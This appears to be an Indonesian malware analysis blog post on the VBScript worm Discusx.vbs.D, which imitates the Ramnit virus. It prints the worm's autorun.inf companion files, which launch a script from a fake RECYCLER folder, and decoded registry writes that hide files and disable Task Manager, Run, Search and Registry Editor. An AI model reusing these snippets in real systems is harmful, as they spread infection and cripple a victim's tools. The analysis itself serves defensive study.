Discusx.vbs.D. Worm yang dibuat menggunakan bahasa pemrograman Visual Basic Script ini tidak jauh berbeda dengan beberapa worm VBS lainnya. Namun variant Discusx.vbs yang satu ini akan mengingatkan kita pada virus Ramnit yang banyak menyebar di Indonesia.
A. Info File
Nama Malware : Discusx.vbs.D
Asal : Indonesia
Ukuran File : 14.6 KB (14,952 bytes)
Packer : ~
Pemrograman : Visual Basic Script
Icon : VBS File
Tipe : Worm
B. About Malware
Jika melihat gambar di atas, mengingatkan kita pada virus Ramnit yang menginfeksi file dengan ekstensi exe, dll, htm dan html. Discusx adalah malware tipe worm yang tidak menginfeksi file lain seperti halnya Ramnit, meski pada varian yang baru ini, terdapat beberapa payload yang mirip dengan Virus Ramnit seperti:
1. Membuat file shortcut pada setiap local drive:
• Copy of Shortcut to (1).lnk
• Copy of Shortcut to (2).lnk
• Copy of Shortcut to (3).lnk
• Copy of Shortcut to (4).lnk
2. Membuat file autorun.inf dan folder RECYLER pada Local Drive.
3. Membuat file dengan nama Watermark.exe pada folder M1crosoft di Program Files.
Seluruh tubuhnya di-encode menggunakan ScrEnc (Script Encoder)seperti yang digunakan oleh virus Alice yang menginfeksi file htm dan html serta menyembunyikan file doc/docx. Untuk mengelabui user, pada bagian awal code ditambahkan string yang seolah menunjukan bahwa worm Discusx adalah merupakan file PE seperti yang terlihat source code berikut ini.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
| 00000000 FF FE 27 00 4D 00 5A 00 90 00 2E 00 2E 00 2E 00 ÿþ'.M.Z........00000016 2E 00 2E 00 2E 00 2E 00 2E 00 2E 00 FF 00 FF 00 ............ÿ.ÿ.00000032 2E 00 2E 00 0D 00 0A 00 27 00 B8 00 2E 00 2E 00 ........'.¸.....00000048 2E 00 2E 00 2E 00 2E 00 2E 00 40 00 2E 00 2E 00 ..........@.....00000064 2E 00 2E 00 2E 00 2E 00 2E 00 2E 00 2E 00 2E 00 ................00000080 2E 00 2E 00 2E 00 2E 00 2E 00 2E 00 2E 00 2E 00 ................00000096 2E 00 2E 00 2E 00 2E 00 2E 00 2E 00 2E 00 2E 00 ................00000112 2E 00 2E 00 2E 00 2E 00 2E 00 2E 00 2E 00 2E 00 ................00000128 2E 00 B8 00 2E 00 2E 00 2E 00 2E 00 2E 00 BA 00 ..¸...........º.00000144 2E 00 2E 00 B4 00 2E 00 CD 00 21 00 B8 00 2E 00 ....´...Í.!.¸...00000160 4C 00 CD 00 21 00 54 00 68 00 69 00 73 00 20 00 L.Í.!.T.h.i.s. .00000176 70 00 72 00 6F 00 67 00 72 00 61 00 6D 00 20 00 p.r.o.g.r.a.m. .00000192 63 00 61 00 6E 00 6E 00 6F 00 74 00 20 00 62 00 c.a.n.n.o.t. .b.00000208 65 00 20 00 72 00 75 00 6E 00 20 00 69 00 6E 00 e. .r.u.n. .i.n.00000224 20 00 44 00 4F 00 53 00 20 00 6D 00 6F 00 64 00 .D.O.S. .m.o.d.00000240 65 00 2E 00 2E 00 2E 00 2E 00 24 00 2E 00 2E 00 e.........$.....00000256 2E 00 2E 00 2E 00 2E 00 2E 00 0D 00 0A 00 27 00 ..............'.00000272 20 00 8F 00 60 01 F9 00 DB 00 CB 00 EB 00 14 20 ..`.ù.Û.Ë.ë..00000288 C6 02 CB 00 EB 00 14 20 C6 02 CB 00 EB 00 14 20 Æ.Ë.ë.. Æ.Ë.ë..00000304 C6 02 0D 00 0A 00 27 00 20 00 20 00 48 00 F7 00 Æ.....'. . .H.÷.00000320 22 21 C6 02 CA 00 EB 00 14 20 C6 02 A2 00 F4 00 "!Æ.Ê.ë.. Æ.¢.ô.00000336 7E 01 C6 02 CA 00 EB 00 14 20 C6 02 0D 00 0A 00 ~.Æ.Ê.ë.. Æ.....00000352 27 00 22 00 F4 00 61 01 C6 02 CA 00 EB 00 14 20 '.".ô.a.Æ.Ê.ë..00000368 C6 02 52 00 69 00 63 00 68 00 CB 00 EB 00 14 20 Æ.R.i.c.h.Ë.ë..00000384 C6 02 0D 00 0A 00 27 00 20 00 20 00 2E 00 2E 00 Æ.....'. . ..... |
C. Companion/File yang dibuat
Seperti yang sudah dijelaskan sebelumnya, companion yang dibuat worm Discusx.vbs.D ini sama seperti yang dibuat Ramnit meskipun sebenarnya hanyalah tipuan agar user menganggap worm ini adalah Ramnit. Perbedaan yang paling mendasar dan sangat terlihat adalah pada autorun.inf yang dibuat. Karena pada autorun.inf buatan Ramnit, source codenya terdapat karakter acak. Sedangkan pada autorun.inf buatan Discusx.vbs.D tidak terdapat karakter aneh dan justru diperjelas dengan penanda bahwa file autorun.inf tersebut adalah companion dari worm Discusx.vbs.D.
1
2
3
| ; Discus-X[autorun]ShellExecute = WScript.exe RECYCLER\S-l-5-2l-796845957-4l3027322-l80l67453l-l003\INF02.dat |
1
2
3
4
| ; Lets Discus-X : )[.ShellClassInfo]IconFile=%SystemRoot%\system32\SHELL32.dllIconIndex=31 |
D. Hasil Infeksi
Beberapa utility Windows tidak bisa digunakan, seperti Run Command, Taks Manager, Search dan Registry Editor seperti yang terlihat pada penggalan script yang sudah di decode berikut ini.
1
2
3
4
5
6
7
8
9
10
11
| wss.regWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title", ".::Let's Discus-X::."wss.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", "2", "REG_DWORD"wss.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden", "0", "REG_DWORD"wss.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", "0", "REG_DWORD"wss.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", "1", "REG_DWORD"wss.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD"wss.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD"wss.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD"wss.Regwrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",
"1", "REG_DWORD"wss.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD"wss.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\RegisteredOwner","Discus-X" |
0 komentar:
Posting Komentar